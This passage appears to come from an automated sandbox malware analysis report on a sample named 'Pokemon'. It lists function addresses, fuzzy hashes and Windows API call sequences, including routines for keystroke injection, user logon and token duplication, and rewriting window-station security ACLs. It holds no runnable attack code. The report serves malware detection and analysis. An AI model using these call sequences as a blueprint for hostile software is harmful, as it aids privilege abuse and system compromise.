                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0909eb6d72300a89010c7f22916e56c45649161cdca84a5e457d3bbb60a1e390
                                                                                                                                                                                                                                                                                      • Instruction ID: 10ae42c9cedf78685511af655b8cc9341be35de40bd8b41487af84e3c1aa337c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0909eb6d72300a89010c7f22916e56c45649161cdca84a5e457d3bbb60a1e390
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46E02B31220A2067EA7037729C01FDF76CCAF013A0F158168FE08A7591CF70DE4081E0
                                                                                                                                                                                                                                                                                      Function 000966E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 8c30aed83c64340521c578ecac39ce42affac8b51b7f431bfe1327a3e4e7c836
                                                                                                                                                                                                                                                                                      • Instruction ID: 252f7d68455e51a179d21dc877457dee505c377761714d79da080d6eef5fa086
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c30aed83c64340521c578ecac39ce42affac8b51b7f431bfe1327a3e4e7c836
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1F03971105702CFCB749FA4E8A0856BBE4BF1432A324893EE6D687A10C7329884EF20
                                                                                                                                                                                                                                                                                      Function 000E6AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2312137581e3729bed5e908992793821ef60341117e015f85819bd4c0834f3c3
                                                                                                                                                                                                                                                                                      • Instruction ID: 0bdde6134affd9b1f5ed6b2f9a4499cfc91b8fcb89743ae956c4e83a543629ed
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2312137581e3729bed5e908992793821ef60341117e015f85819bd4c0834f3c3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAF05571B08280AEE7304BA5A8057F6F7E8AB20340F10851AD4D4C3082CBB300D09752
                                                                                                                                                                                                                                                                                      Function 0009684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                      • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                      • Instruction ID: ce016e1e51ba5b98b00ac6291564a3e0f6b232affc59c1d23dbf1c06b163a542
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5F0F87550020DFFDF45DF90C941EDE7BB9FB04318F208545F9159A251C336EA21ABA1
                                                                                                                                                                                                                                                                                      Function 00093907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00093963
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c43e5490448df3e19019f05c8fcf5366940ff7fd1237d76b543c29841eb3a7ac
                                                                                                                                                                                                                                                                                      • Instruction ID: 9ebce005d23d8f3530524d939930dc8f4d4951d1aa0202f13294169afd63afe3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c43e5490448df3e19019f05c8fcf5366940ff7fd1237d76b543c29841eb3a7ac
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9F037709143549FEB629F24DC4A7D57BFCB70570CF0001A5E64496282D7B457C8CF51
                                                                                                                                                                                                                                                                                      Function 00093A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00093A76
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                      • Opcode ID: eea92f22459fc140089c695b6c9f0bba8fc1942d6060ce2a7125af9a2fb810ed
                                                                                                                                                                                                                                                                                      • Instruction ID: 70ce800cf7db9da41e28169a50b95eb9ce97679ed6bb6dbd3cca4778e1256fba
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eea92f22459fc140089c695b6c9f0bba8fc1942d6060ce2a7125af9a2fb810ed
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCE0C272A002246BCB20A258EC06FEA77EDDFC87A0F0540B1FC09D7359D960EDC496A0
                                                                                                                                                                                                                                                                                      Function 000D071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,00000000,?,000D0A84,?,?,00000000,?,000D0A84,00000000,0000000C), ref: 000D0737
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 690d6c363c6074a99bbcb137129f16e05c9b3b7afc3e839c19fa2618aa429c50
                                                                                                                                                                                                                                                                                      • Instruction ID: 5ec25658b80e44ce3ecad9aa7f9482912b56f976c88f4333ca3ab564c98dde30
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 690d6c363c6074a99bbcb137129f16e05c9b3b7afc3e839c19fa2618aa429c50
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FD06C3200010DBBDF129F84ED06EDA3BAAFB48714F014000BE1856420C732E872AB90
                                                                                                                                                                                                                                                                                      Function 000FEAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,000FD840), ref: 000FEAB1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 05f4f13486d78832c5ba15e21cba91c09c29610db6ee1cd658082a3f09008a2f
                                                                                                                                                                                                                                                                                      • Instruction ID: 2310b1c1a6c1faacc3647387ea007a4bb7ecd43d7ca10471a83110a47befe6db
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05f4f13486d78832c5ba15e21cba91c09c29610db6ee1cd658082a3f09008a2f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85B09224000A4455AD680A3CEA09DA933817A523A67FC1BC0E579858F1C339E85FB952
                                                                                                                                                                                                                                                                                      Function 0010664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDC54: FindFirstFileW.KERNEL32(?,?), ref: 000FDCCB
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 000FDD1B
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 000FDD2C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FDC54: FindClose.KERNEL32(00000000), ref: 000FDD43
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0010666E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e833f237a1952e78dc1c0d7a61de969b12d1f325e5e6feba91d020231422817d
                                                                                                                                                                                                                                                                                      • Instruction ID: 1840b1f869d44d988e34ebb413514dda93512df5c0a471f9f6deea83726f779f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e833f237a1952e78dc1c0d7a61de969b12d1f325e5e6feba91d020231422817d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51F0A0366102049FCB14EF58D855BAEB7E9BF88360F048419F9499B353CB70BC01DB90

                                                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                                                      Function 000AFC7C Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 000AFC86
                                                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000EFCB8
                                                                                                                                                                                                                                                                                      • IsIconic.USER32(00000000), ref: 000EFCC1
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000009), ref: 000EFCCE
                                                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 000EFCD8
                                                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000EFCEE
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000EFCF5
                                                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000EFD01
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 000EFD12
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 000EFD1A
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 000EFD22
                                                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 000EFD25
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000EFD3A
                                                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 000EFD45
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000EFD4F
                                                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 000EFD54
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000EFD5D
                                                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 000EFD62
                                                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000EFD6C
                                                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 000EFD71
                                                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 000EFD74
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 000EFD9B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                                                                                                                                                                                      • Opcode ID: 128510953791d96d8610825e2a82688633584d13de29d2a68b745532a5914a43
                                                                                                                                                                                                                                                                                      • Instruction ID: e996c28d40ac4ac95b5788a7d6dde9bbf9ffaea074c546c1fb1845f558422969
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 128510953791d96d8610825e2a82688633584d13de29d2a68b745532a5914a43
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C318371A40218BFEB306BA69C4AFBF7E7DEB44B50F200065FA01F61D0D6F05D51AAA0
                                                                                                                                                                                                                                                                                      Function 000F1B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000F205A
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000F2087
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2010: GetLastError.KERNEL32 ref: 000F2097
                                                                                                                                                                                                                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 000F1BD2
                                                                                                                                                                                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 000F1BF4
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000F1C05
                                                                                                                                                                                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000F1C1D
                                                                                                                                                                                                                                                                                      • GetProcessWindowStation.USER32 ref: 000F1C36
                                                                                                                                                                                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 000F1C40
                                                                                                                                                                                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000F1C5C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000F1B48), ref: 000F1A20
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A0B: CloseHandle.KERNEL32(?,?,000F1B48), ref: 000F1A35
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                      • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                      • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                      • Opcode ID: 8149a94a6965c75914319090e40ceed565d8b18cacca7133c2a023d60c43932e
                                                                                                                                                                                                                                                                                      • Instruction ID: e8b034451db713abef5ec19a4ec36d4f5bc00ba0394821b943964f5547133580
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8149a94a6965c75914319090e40ceed565d8b18cacca7133c2a023d60c43932e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE81447190020DEBDF219FA4EC49FFE7BB8EF08304F144129FA14A65A1D7758A96DB60
                                                                                                                                                                                                                                                                                      Function 000F14AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000F1A60
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A6C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A7B
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A82
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000F1A99
                                                                                                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000F1518
                                                                                                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000F154C
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 000F1563
                                                                                                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 000F159D
                                                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000F15B9
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 000F15D0
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 000F15D8
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 000F15DF
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000F1600
                                                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 000F1607
                                                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000F1636
                                                                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000F1658
                                                                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000F166A
